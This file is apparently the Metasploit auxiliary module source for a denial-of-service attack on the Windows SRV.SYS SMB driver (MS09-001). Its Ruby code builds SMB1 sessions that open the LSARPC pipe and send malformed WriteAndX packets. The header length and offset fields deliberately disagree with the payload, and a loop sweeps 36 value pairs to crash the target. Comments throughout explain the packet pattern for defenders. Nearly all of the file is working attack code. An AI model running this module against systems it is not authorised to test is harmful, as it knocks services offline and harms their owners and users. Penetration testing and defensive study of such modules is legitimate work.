GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smb/ms09_001_write.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary DoS module against the Windows SRV.SYS SMB server (MS09-001 /
# CVE-2008-4114, per the references below). It builds SMB1 WriteAndX requests
# whose DataLenLow / DataOffset header fields disagree with the real payload
# and sweeps those two fields over a range of values.
#
# From a defender's point of view the on-the-wire pattern is a burst of short
# SMB1 sessions (connect + login) each carrying one NT_CREATE_ANDX for the
# \LSARPC pipe followed by a single malformed WRITE_ANDX; the sweep in #run
# produces up to 36 such sessions.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  # Registers module metadata. No module-specific options are added; one
  # inherited option is removed (see the comment at the end of the method).
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
        'Description' => %q{
This module exploits a denial of service vulnerability in the
SRV.SYS driver of the Windows operating system.

This module has been tested successfully against Windows Vista.
},

        'Author' => [ 'j.v.vallejo[at]gmail.com' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['MSB', 'MS09-001'],
          ['OSVDB', '48153'],
          ['CVE', '2008-4114'],
          ['BID', '31179'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # send_smb_pkt pins negotiation to SMB1 via connect(versions: [1]), so the
    # inherited SMB::ProtocolVersion option would have no effect; hide it.
    deregister_options('SMB::ProtocolVersion')
  end

  # Opens a fresh SMB1 session, creates a handle on the \LSARPC pipe with
  # NT_CREATE_ANDX, then sends one WRITE_ANDX whose length/offset header
  # fields come from the arguments rather than from the actual payload.
  #
  # @param dlenlow [Integer] value written to the WriteAndX DataLenLow field
  # @param doffset [Integer] value written to the WriteAndX DataOffset field
  # @param fillersize [Integer] number of random bytes sent as the write
  #   payload; also written verbatim into Remaining and ByteCount
  # @return [void]
  #
  # NOTE(review): every call does connect + smb_login and this method never
  #   calls disconnect; socket cleanup is left to the framework (not visible
  #   here), so a full sweep from #run leaves many sessions open until then.
  def send_smb_pkt(dlenlow, doffset, fillersize)
    connect(versions: [1])
    smb_login

    # --- NT_CREATE_ANDX: obtain a FileID to write to ---
    pkt = CONST::SMB_CREATE_PKT.make_struct
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc807

    # Session identifiers are copied from the authenticated client state so
    # the server accepts the request as part of this session.
    pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
    pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
    pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
    pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

    pkt['Payload']['SMB'].v['WordCount'] = 24

    # AndX = 255 (0xff) presumably means "no chained command" and 0xdede is
    # then an unused placeholder offset -- SMB protocol knowledge, not
    # established by anything in this file.
    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['AndXOffset'] = 0xdede
    # 14 == byte length of the name below, excluding its two trailing NULs.
    pkt['Payload'].v['FileNameLen'] = 14
    pkt['Payload'].v['CreateFlags'] = 0x16
    pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
    pkt['Payload'].v['ShareAccess'] = 7
    pkt['Payload'].v['CreateOptions'] = 0x400040
    pkt['Payload'].v['Impersonation'] = 2
    pkt['Payload'].v['Disposition'] = 1
    # Null-interleaved (wide-string style) "\LSARPC" plus a two-byte terminator.
    pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"

    simple.client.smb_send(pkt.to_s)
    # The server's FileID from the create response is reused below.
    ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)

    # --- WRITE_ANDX: the malformed request ---
    pkt = CONST::SMB_WRITE_PKT.make_struct
    # Computed but deliberately unused (hence the leading underscore): the
    # real data offset is replaced by the caller-supplied doffset below.
    _data_offset = pkt.to_s.length - 4
    filler = Rex::Text.rand_text(fillersize)

    pkt['Payload']['SMB'].v['Signature1'] = 0xcccccccc
    pkt['Payload']['SMB'].v['Signature2'] = 0xcccccccc
    pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
    pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
    pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
    pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc807
    pkt['Payload']['SMB'].v['WordCount'] = 14
    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['AndXOffset'] = 0xdede
    pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
    pkt['Payload'].v['Offset'] = 0
    pkt['Payload'].v['Reserved2'] = -1
    pkt['Payload'].v['WriteMode'] = 8
    pkt['Payload'].v['Remaining'] = fillersize
    pkt['Payload'].v['DataLenHigh'] = 0
    # The two caller-controlled fields. They are set independently of the
    # real payload length/position, so the header disagrees with ByteCount
    # and the filler that actually follows -- this mismatch is the malformed
    # condition the module sends (see the MS09-001 reference in initialize).
    pkt['Payload'].v['DataLenLow'] = dlenlow
    pkt['Payload'].v['DataOffset'] = doffset
    pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc
    # ByteCount and the payload itself are consistent with each other
    # (both derived from fillersize); only DataLenLow/DataOffset are off.
    pkt['Payload'].v['ByteCount'] = fillersize
    pkt['Payload'].v['Payload'] = filler

    # Fire and forget: no response is read for the WriteAndX.
    simple.client.smb_send(pkt.to_s)
  end

  # Module entry point. Sweeps DataOffset (j) and DataLenLow (i) from 0xffff
  # downwards in steps of 10000 while each stays above 10000, i.e. six values
  # each (65535, 55535, 45535, 35535, 25535, 15535) for 36 attempts, with the
  # filler size fixed at 72 bytes. Each attempt opens its own SMB session.
  #
  # Any StandardError raised by an attempt (for example the target no longer
  # answering) is printed as 'rescue' and the sweep simply continues; there is
  # no early exit once the host stops responding.
  #
  # @return [void]
  def run
    print_line('Attempting to crash the remote host...')
    k = 72
    j = 0xffff
    while j > 10000
      i = 0xffff
      while i > 10000
        begin
          print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
          send_smb_pkt(i, j, k)
        rescue StandardError
          print_line('rescue')
        end
        i -= 10000
      end
      j -= 10000
    end
  end
end